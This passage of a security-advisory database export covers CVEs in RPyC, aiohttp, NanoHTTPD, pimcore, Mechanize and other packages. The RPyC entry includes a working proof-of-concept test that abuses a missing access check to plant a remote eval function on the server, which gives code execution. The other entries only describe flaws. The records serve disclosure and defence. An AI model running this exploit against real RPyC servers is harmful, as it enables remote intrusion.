custom RPyC services making it susceptible to authenticated remote attacks. + +### Patches +Git commits between September 2018 and October 2019 and version 4.1.0 are vulnerable. Use a version of RPyC that is not affected. + +### Workarounds +The commit `d818ecc83a92548994db75a0e9c419c7bce680d6` could be used as a patch to add the missing access check. + +### References +[CVE-2019-16328](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16328) +[RPyC Security Documentation](https://rpyc.readthedocs.io/en/latest/docs/security.html#security) + +### For more information +If you have any questions or comments about this advisory: +* Open an issue using [GitHub](https://github.com/tomerfiliba-org/rpyc) + +### Proof of Concept +``` +import logging +import rpyc +import tempfile +from subprocess import Popen, PIPE +import unittest + + +PORT = 18861 +SERVER_SCRIPT = f""""""#!/usr/bin/env python +import rpyc +from rpyc.utils.server import ThreadedServer, ThreadPoolServer +from rpyc import SlaveService +import rpyc + + +class Foe(object): + foo = ""bar"" + + +class Fee(rpyc.Service): + exposed_Fie = Foe + + def exposed_nop(self): + return + + +if __name__ == ""__main__"": + server = ThreadedServer(Fee, port={PORT}, auto_register=False) + thd = server.start() +"""""" + + +def setattr_orig(target, attrname, codeobj): + setattr(target, attrname, codeobj) + + +def myeval(self=None, cmd=""__import__('sys')""): + return eval(cmd) + + +def get_code(obj_codetype, func, filename=None, name=None): + func_code = func.__code__ + arg_names = ['co_argcount', 'co_posonlyargcount', 'co_kwonlyargcount', 'co_nlocals', 'co_stacksize', 'co_flags', + 'co_code', 'co_consts', 'co_names', 'co_varnames', 'co_filename', 'co_name', 'co_firstlineno', + 'co_lnotab', 'co_freevars', 'co_cellvars'] + + codetype_args = [getattr(func_code, n) for n in arg_names] + if filename: + codetype_args[arg_names.index('co_filename')] = filename + if name: + codetype_args[arg_names.index('co_name')] = name + mycode = obj_codetype(*codetype_args) + return mycode + + +def _vercmp_gt(ver1, ver2): + ver1_gt_ver2 = False + for i, v1 in enumerate(ver1): + v2 = ver2[i] + if v1 > v2: + ver1_gt_ver2 = True + break + elif v1 == v2: + continue + else: # v1 < v2 + break + return ver1_gt_ver2 + + +@unittest.skipIf(not _vercmp_gt(rpyc.__version__, (3, 4, 4)), ""unaffected version"") +class Test_InfoDisclosure_Service(unittest.TestCase): + + @classmethod + def setUpClass(cls): + + cls.logger = logging.getLogger('rpyc') + cls.logger.setLevel(logging.DEBUG) # NOTSET only traverses until another level is found, so DEBUG is preferred + cls.hscript = tempfile.NamedTemporaryFile() + cls.hscript.write(SERVER_SCRIPT.encode()) + cls.hscript.flush() + while cls.hscript.file.tell() != len(SERVER_SCRIPT): + pass + cls.server = Popen([""python"", cls.hscript.name], stdout=PIPE, stderr=PIPE, text=True) + cls.conn = rpyc.connect(""localhost"", PORT) + + @classmethod + def tearDownClass(cls): + cls.conn.close() + cls.logger.info(cls.server.stdout.read()) + cls.logger.info(cls.server.stderr.read()) + cls.server.kill() + cls.hscript.close() + + def netref_getattr(self, netref, attrname): + # PoC CWE-358: abuse __cmp__ function that was missing a security check + handler = rpyc.core.consts.HANDLE_CMP + return self.conn.sync_request(handler, netref, attrname, '__getattribute__') + + def test_1_modify_nop(self): + # create netrefs for builtins and globals that will be used to construct on remote + remote_svc_proto = self.netref_getattr(self.conn.root, '_protocol') + remote_dispatch = self.netref_getattr(remote_svc_proto, '_dispatch_request') + remote_class_globals = self.netref_getattr(remote_dispatch, '__globals__') + remote_modules = self.netref_getattr(remote_class_globals['sys'], 'modules') + _builtins = remote_modules['builtins'] + remote_builtins = {k: self.netref_getattr(_builtins, k) for k in dir(_builtins)} + + # populate globals for CodeType calls on remote + remote_globals = remote_builtins['dict']() + for name, netref in remote_builtins.items(): + remote_globals[name] = netref + for name, netref in self.netref_getattr(remote_modules, 'items')(): + remote_globals[name] = netref + + # create netrefs for types to create remote function malicously + remote_types = remote_builtins['__import__'](""types"") + remote_types_CodeType = self.netref_getattr(remote_types, 'CodeType') + remote_types_FunctionType = self.netref_getattr(remote_types, 'FunctionType') + + # remote eval function constructed + remote_eval_codeobj = get_code(remote_types_CodeType, myeval, filename='test_code.py', name='__code__') + remote_eval = remote_types_FunctionType(remote_eval_codeobj, remote_globals) + # PoC CWE-913: modify the exposed_nop of service + # by binding various netrefs in this execution frame, they are cached in + # the remote address space. setattr and eval functions are cached for the life + # of the netrefs in the frame. A consequence of Netref classes inheriting + # BaseNetref, each object is cached under_local_objects. So, we are able + # to construct arbitrary code using types and builtins. + + # use the builtin netrefs to modify the service to use the constructed eval func + remote_setattr = remote_builtins['setattr'] + remote_type = remote_builtins['type'] + remote_setattr(remote_type(self.conn.root), 'exposed_nop', remote_eval) + + # show that nop was replaced by eval to complete the PoC + remote_sys = self.conn.root.nop('__import__(""sys"")') + remote_stack = self.conn.root.nop('"""".join(__import__(""traceback"").format_stack())') + self.assertEqual(type(remote_sys).__name__, 'builtins.module') + self.assertIsInstance(remote_sys, rpyc.core.netref.BaseNetref) + self.assertIn('rpyc/utils/server.py', remote_stack) + + def test_2_new_conn_impacted(self): + # demostrate impact and scope of vuln for new connections + self.conn.close() + self.conn = rpyc.connect(""localhost"", PORT) + # show new conn can still use nop as eval + remote_sys = self.conn.root.nop('__import__(""sys"")') + remote_stack = self.conn.root.nop('"""".join(__import__(""traceback"").format_stack())') + self.assertEqual(type(remote_sys).__name__, 'builtins.module') + self.assertIsInstance(remote_sys, rpyc.core.netref.BaseNetref) + self.assertIn('rpyc/utils/server.py', remote_stack) + + +if __name__ == ""__main__"": + unittest.main() +```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'rpyc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.1'}]}], 'versions': ['4.1.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tomerfiliba-org/rpyc/security/advisories/GHSA-pj4g-4488-wmxm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16328'}, {'type': 'PACKAGE', 'url': 'https://github.com/tomerfiliba-org/rpyc'}, {'type': 'WEB', 'url': 'https://github.com/tomerfiliba/rpyc'}, {'type': 'WEB', 'url': 'https://rpyc.readthedocs.io/en/latest/docs/security.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00046.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00004.html'}]","{'cwe_ids': ['CWE-1321', 'CWE-285'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-17T19:50:44Z', 'nvd_published_at': '2019-10-03T20:15:00Z'}" +1.4.0,GHSA-v6wp-4m6f-gcjg,2023-08-23T23:03:00Z,2021-02-26T02:11:57Z,,['CVE-2021-21330'],`aiohttp` Open Redirect vulnerability (`normalize_path_middleware` middleware),"### Impact +_What kind of vulnerability is it? Who is impacted?_ + +Open redirect vulnerability — a maliciously crafted link to an aiohttp-based web-server could redirect the browser to a different website. + +It is caused by a bug in the `aiohttp.web_middlewares.normalize_path_middleware` middleware. + +### Patches +_Has the problem been patched? What versions should users upgrade to?_ + +This security problem has been fixed in v3.7.4. Upgrade your dependency as follows: +[`pip install aiohttp >= 3.7.4`] + +### Workarounds +_Is there a way for users to fix or remediate the vulnerability without upgrading?_ + +If upgrading is not an option for you, a workaround can be to avoid using `aiohttp.web_middlewares.normalize_path_middleware` in your applications. + +### References +_Are there any links users can visit to find out more?_ + +* [aiohttp @ PyPI] +* [GHSA-v6wp-4m6f-gcjg] +* [OWASP page on open redirects] + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in the [aiohttp repo](https://github.com/aio-libs/aiohttp/issues/new/choose) +* Email us at wk+aio-libs-security@sydorenko.org.ua and/or andrew.svetlov+aio-libs-security@gmail.com + +Credit: [Jelmer Vernooij] and [Beast Glatisant]. + +[aiohttp @ PyPI]: https://pypi.org/p/aiohttp +[`pip install aiohttp >= 3.7.4`]: https://pypi.org/project/aiohttp/3.7.4/ +[GHSA-v6wp-4m6f-gcjg]: https://github.com/aio-libs/aiohttp/security/advisories/GHSA-v6wp-4m6f-gcjg +[OWASP page on open redirects]: +https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html + +[Jelmer Vernooij]: https://jelmer.uk +[Beast Glatisant]: https://github.com/g147","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'aiohttp'}, 'ecosystem_specific': {'affected_functions': ['aiohttp.web_middlewares.normalize_path_middleware']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.7.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/aio-libs/aiohttp/security/advisories/GHSA-v6wp-4m6f-gcjg'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21330'}, {'type': 'WEB', 'url': 'https://github.com/aio-libs/aiohttp/commit/2545222a3853e31ace15d87ae0e2effb7da0c96b'}, {'type': 'WEB', 'url': 'https://github.com/aio-libs/aiohttp/blob/master/CHANGES.rst#374-2021-02-25'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FU7ENI54JNEK3PHEFGCE46DGMFNTVU6L/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JN3V7CZJRT4QFCVXB6LDPCJH7NAOFCA5/'}, {'type': 'WEB', 'url': 'https://pypi.org/project/aiohttp/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-19'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4864'}]","{'cwe_ids': ['CWE-601'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-02-26T02:11:40Z', 'nvd_published_at': '2021-02-26T03:15:00Z'}" +1.4.0,GHSA-pr5m-4w22-8483,2023-09-12T16:37:20Z,2021-02-25T16:32:34Z,,['CVE-2020-13697'],NanoHTTPD Cross-site Scripting vulnerability,"An issue was discovered in RouterNanoHTTPD.java in NanoHTTPD through 2.3.1. The GeneralHandler class implements a basic GET handler that prints debug information as an HTML page. Any web server that extends this class without implementing its own GET handler is vulnerable to reflected XSS, because the GeneralHandler GET handler prints user input passed through the query string without any sanitization.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.nanohttpd:nanohttpd-nanolets'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13697'}, {'type': 'PACKAGE', 'url': 'https://github.com/NanoHttpd/nanohttpd'}, {'type': 'WEB', 'url': 'https://github.com/NanoHttpd/nanohttpd/blob/efb2ebf85a2b06f7c508aba9eaad5377e3a01e81/nanolets/pom.xml'}, {'type': 'WEB', 'url': 'https://github.com/NanoHttpd/nanohttpd/blob/efb2ebf85a2b06f7c508aba9eaad5377e3a01e81/nanolets/src/main/java/org/nanohttpd/router/RouterNanoHTTPD.java'}, {'type': 'WEB', 'url': 'https://www.vdoo.com/advisories/#CVE-2020-13697'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-24T07:10:37Z', 'nvd_published_at': '2021-02-23T08:15:00Z'}" +1.4.0,GHSA-w46j-8hm6-h8mm,2023-09-12T20:53:29Z,2021-02-11T20:47:34Z,,['CVE-2021-23327'],XSS in apexcharts,The package apexcharts before 3.24.0 are vulnerable to Cross-site Scripting (XSS) via lack of sanitization of graph legend fields.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'apexcharts'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.24.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23327'}, {'type': 'WEB', 'url': 'https://github.com/apexcharts/apexcharts.js/pull/2158'}, {'type': 'WEB', 'url': 'https://github.com/apexcharts/apexcharts.js/commit/68f3f34d125719b4767614fe0a595cc65bde1d19'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1070616'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-APEXCHARTS-1062708'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/apexcharts'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-10T18:18:38Z', 'nvd_published_at': '2021-02-09T08:15:00Z'}" +1.4.0,GHSA-h7f9-cvh5-qw7f,2023-09-12T15:34:23Z,2021-02-25T16:32:46Z,,['CVE-2021-23340'],Path traversal in pimcore/pimcore,"This affects the package pimcore/pimcore before 6.8.8. A Local FIle Inclusion vulnerability exists in the downloadCsvAction function of the CustomReportController class (bundles/AdminBundle/Controller/Reports/CustomReportController.php). An authenticated user can reach this function with a GET request at the following endpoint: /admin/reports/custom-report/download-csv?exportFile=&91;filename]. Since exportFile variable is not sanitized, an attacker can exploit a local file inclusion vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.8.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23340'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/1786bdd4962ee51544fad537352c2b4223309442'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/blob/v6.7.2/bundles/AdminBundle/Controller/Reports/CustomReportController.php%23L454'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-1070132'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-24T07:37:55Z', 'nvd_published_at': '2021-02-18T15:15:00Z'}" +1.4.0,GHSA-xhv5-w9c5-2r2w,2022-10-25T20:51:11Z,2021-02-02T21:42:56Z,,['CVE-2021-21294'],Unbounded connection acceptance in http4s-blaze-server,"### Impact + +blaze-core, a library underlying http4s-blaze-server, accepts connections unboundedly on its selector pool. This has the net effect of amplifying degradation in services that are unable to handle their current request load, since incoming connections are still accepted and added to an unbounded queue. Each connection allocates a socket handle, which drains a scarce OS resource. This can also confound higher level circuit breakers which work based on detecting failed connections. + +http4s provides a general `MaxActiveRequests` middleware mechanism for limiting open connections, but it is enforced inside the Blaze accept loop, after the connection is accepted and the socket opened. Thus, the limit only prevents the number of connections which can be simultaneously processed, not the number of connections which can be held open. + +### Patches + +In 0.21.18, 0.22.0-M3, and 1.0.0-M16, a new`maxConnections` property, with a default value of 1024, has been added to the `BlazeServerBuilder`. Setting the value to a negative number restores unbounded behavior, but is strongly disrecommended. + +The NIO2 backend does not respect `maxConnections`. Its use is now deprecated in http4s-0.21, and the option is removed altogether starting in http4s-0.22. + +The connections are bounded in 0.21.17, 0.22.0-M2, and 1.0.0-M14, but the `maxConnections` parameter was passed incorrectly, making it impossible to change the Blaze default of 512. + +### Workarounds +* An Nginx side-car acting as a reverse proxy for the local http4s-blaze-server instance would be able to apply a connection limiting semantic before the sockets reach blaze-core. Nginx’s connection bounding is both asynchronous and properly respects backpressure. +* http4s-ember-server is an alternative to http4s-blaze-server, but does not yet have HTTP/2 or web socket support. Its performance in terms of RPS is appreciably behind Blaze’s, and as the newest backend, has substantially less industrial uptake. +* http4s-jetty is an alternative to http4s-blaze-server, but does not yet have web socket support. Its performance in terms of requests per second is somewhat behind Blaze’s, and despite Jetty's industrial adoption, the http4s integration has substantially less industrial uptake. +* http4s-tomcat is an alternative to http4s-blaze-server, but does not yet have HTTP/2 web socket support. Its performance in terms of requests per second is somewhat behind Blaze’s, and despite Jetty's industrial adoption, the http4s integration has substantially less industrial uptake. + +### References + +See [the Blaze GHSA](https://github.com/http4s/blaze/security/advisories/GHSA-xmw9-q7x9-j5qc) for more on the underlying issue. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [http4s/http4s](http://github.com/http4s/http4s) +* Contact us according to the [http4s security policy](https://github.com/http4s/http4s/security/policy)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-blaze-server_2.12'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.21.17'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.http4s:http4s-blaze-server_2.13'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.21.17'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/http4s/blaze/security/advisories/GHSA-xmw9-q7x9-j5qc'}, {'type': 'WEB', 'url': 'https://github.com/http4s/http4s/security/advisories/GHSA-xhv5-w9c5-2r2w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21294'}, {'type': 'WEB', 'url': 'https://github.com/http4s/http4s/commit/987d6589ef79545b9bb2324ac4bdebf82d9a0171'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-02T21:42:25Z', 'nvd_published_at': '2021-02-02T22:15:00Z'}" +1.4.0,GHSA-f62v-xpxf-3v68,2022-02-08T22:04:08Z,2021-02-03T19:16:35Z,,['CVE-2020-11979'],Code injection in Apache Ant,"As mitigation for CVE-2020-1945 Apache Ant 1.10.8 changed the permissions of temporary files it created so that only the current user was allowed to access them. Unfortunately the fixcrlf task deleted the temporary file and created a new one without said protection, effectively nullifying the effort. This would still allow an attacker to inject modified source files into the build process.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ant:ant'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gradle/gradle/security/advisories/GHSA-j45w-qrgf-25vm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11979'}, {'type': 'WEB', 'url': 'https://github.com/apache/ant/commit/87ac51d3c22bcf7cfd0dc07cb0bd04a496e0d428'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/ant'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r107ea1b1a7a214bc72fe1a04207546ccef542146ae22952e1013b5cc@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1dc8518dc99c42ecca5ff82d0d2de64cd5d3a4fa691eb9ee0304781e@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2306b67f20c24942b872b0a41fbdc9330e8467388158bcd19c1094e0@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4ca33fad3fb39d130cda287d5a60727d9e706e6f2cf2339b95729490@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5e1cdd79f019162f76414708b2092acad0a6703d666d72d717319305@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/raaeddc41da8f3afb1cb224876084a45f68e437a0afd9889a707e4b0c@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbfe9ba28b74f39f46ec1bbbac3bef313f35017cf3aac13841a84483a@%3Cdev.creadur.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc3c8ef9724b5b1e171529b47f4b35cb7920edfb6e917fa21eb6c64ea%40%3Cdev.ant.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AALW42FWNQ35F7KB3JVRC6NBVV7AAYYI/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DYBRN5C2RW7JRY75IB7Q7ZVKZCHWAQWS/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U3NRQQ7ECII4ZNGW7GBC225LVYMPQEKB/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202011-18'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-03T19:14:47Z', 'nvd_published_at': '2020-10-01T20:15:00Z'}" +1.4.0,GHSA-h6wq-jw7q-grxv,2021-02-24T19:38:21Z,2021-02-24T19:38:21Z,2021-02-24T19:38:21Z,[],Elliptic Curve Key Disclosure,Affected versions of the package are vulnerable to Elliptic Curve Key Disclosure.,[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.bitbucket.b_c:jose4j'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.6'}, {'fixed': '0.5.5'}]}]}]","[{'type': 'WEB', 'url': 'https://bitbucket.org/b_c/jose4j/commits/0517896170af8d5c057407c70a7b08dae454829e'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/WS-2017-0208'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-05-23T07:37:09Z', 'nvd_published_at': None}" +1.4.0,GHSA-qrqm-fpv6-6r8g,2022-04-27T20:24:21Z,2021-02-02T18:50:27Z,,['CVE-2021-21289'],Command Injection Vulnerability in Mechanize,"This security advisory has been created for public disclosure of a Command Injection vulnerability that was responsibly reported by @kyoshidajp (Katsuhiko YOSHIDA). + +### Impact + +Mechanize `>= v2.0`, `< v2.7.7` allows for OS commands to be injected using several classes' methods which implicitly use Ruby's `Kernel.open` method. Exploitation is possible only if untrusted input is used as a local filename and passed to any of these calls: + +- `Mechanize::CookieJar#load`: since v2.0 (see 208e3ed) +- `Mechanize::CookieJar#save_as`: since v2.0 (see 5b776a4) +- `Mechanize#download`: since v2.2 (see dc91667) +- `Mechanize::Download#save` and `#save!` since v2.1 (see 98b2f51, bd62ff0) +- `Mechanize::File#save` and `#save_as`: since v2.1 (see 2bf7519) +- `Mechanize::FileResponse#read_body`: since v2.0 (see 01039f5) + + +### Patches + +These vulnerabilities are patched in Mechanize v2.7.7. + + +### Workarounds + +No workarounds are available. We recommend upgrading to v2.7.7 or later. + + +### References + +See https://docs.rubocop.org/rubocop/cops_security.html#securityopen for background on why `Kernel.open` should not be used with untrusted input. + + +### For more information + +If you have any questions or comments about this advisory, please open an issue in [sparklemotion/mechanize](https://github.com/sparklemotion/mechanize/issues/new).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'mechanize'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.7.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sparklemotion/mechanize/security/advisories/GHSA-qrqm-fpv6-6r8g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21289'}, {'type': 'WEB', 'url': 'https://github.com/sparklemotion/mechanize/commit/66a6a1bfa653a5f13274a396a5e5441238656aa0'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/mechanize/CVE-2021-21289.yml'}, {'type': 'PACKAGE', 'url': 'https://github.com/sparklemotion/mechanize'}, {'type': 'WEB', 'url': 'https://github.com/sparklemotion/mechanize/releases/tag/v2.7.7'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/02/msg00021.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LBVVJUL4P4KCJH4IQTHFZ4ATXY7XXZPV/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YNFZ7ROYS6V4J5L5PRAJUG2AWC7VXR2V/'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/mechanize/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-17'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-02T18:50:15Z', 'nvd_published_at': '2021-02-02T19:15:00Z'}" +1.4.0,GHSA-r3j7-x2g5-9gx6,2022-05-03T03:44:37Z,2021-02-11T20:47:27Z,,['CVE-2021-27185'],Command injection in samba-client,The samba-client package before 4.0.0 for Node.js allows command injection because of the use of process.exec.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'samba-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27185'}, {'type': 'WEB', 'url': 'https://github.com/eflexsystems/node-samba-client/commit/5bc3bbad9b8d02243bc861a11ec73f788fbb1235'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2021-4302'}, {'type': 'PACKAGE', 'url': 'https://github.com/eflexsystems/node-samba-client'}, {'type': 'WEB', 'url': 'https://github.com/eflexsystems/node-samba-client/releases/tag/4.0.0'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210319-0002/'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/samba-client'}]","{'cwe_ids': ['CWE-74', 'CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-02-11T18:18:32Z', 'nvd_published_at': '2021-02-10T22:15:00Z'}" +1.4.0,GHSA-p4pj-mg4r-x6v4,2021-02-16T17:45:27Z,2021-02-02T15:46:38Z,,['CVE-2021-21317'],Denial of Service in uap-core,"## Impact + +Some regexes are vulnerable to regular expression denial of service (REDoS) due to overlapping capture groups. This allows remote attackers to overload a server by setting the User-Agent header in an HTTP(S) request to maliciously crafted long strings. + +## Patches + +Please update uap-core to >= v0.11.0 + +Downstream packages such as uap-python, uap-ruby etc which depend upon uap-core follow different version schemes.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'uap-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.11.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ua-parser/uap-core/security/advisories/GHSA-p4pj-mg4r-x6v4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21317'}, {'type': 'WEB', 'url': 'https://github.com/ua-parser/uap-core/commit/dc9925d458214cfe87b93e35346980612f6ae96c'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/uap-core'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-01T16:57:05Z', 'nvd_published_at': '2021-02-16T18:15:00Z'}" +1.4.0,GHSA-q2hm-gx3f-h63q,2021-02-23T21:23:16Z,2021-02-23T21:23:16Z,2021-02-23T21:23:16Z,[],Backdoor / Malicious code,"lita-coin 0.0.3 contains a backdoor mechanism that allows launching of hidden cryptocurrency mining operations inside the project. The code also contained a backdoor mechanism that allowed the attacker to send a cookie file back to a compromised project, and allow the attacker to execute malicious commands.",[],"[{'package': {'ecosystem': 'RubyGems', 'name': 'lita-coin'}, 'versions': ['0.0.3']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-15224'}, {'type': 'WEB', 'url': 'https://www.zdnet.com/article/backdoor-code-found-in-11-ruby-libraries/'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2019-08-28T16:16:58Z', 'nvd_published_at': None}" 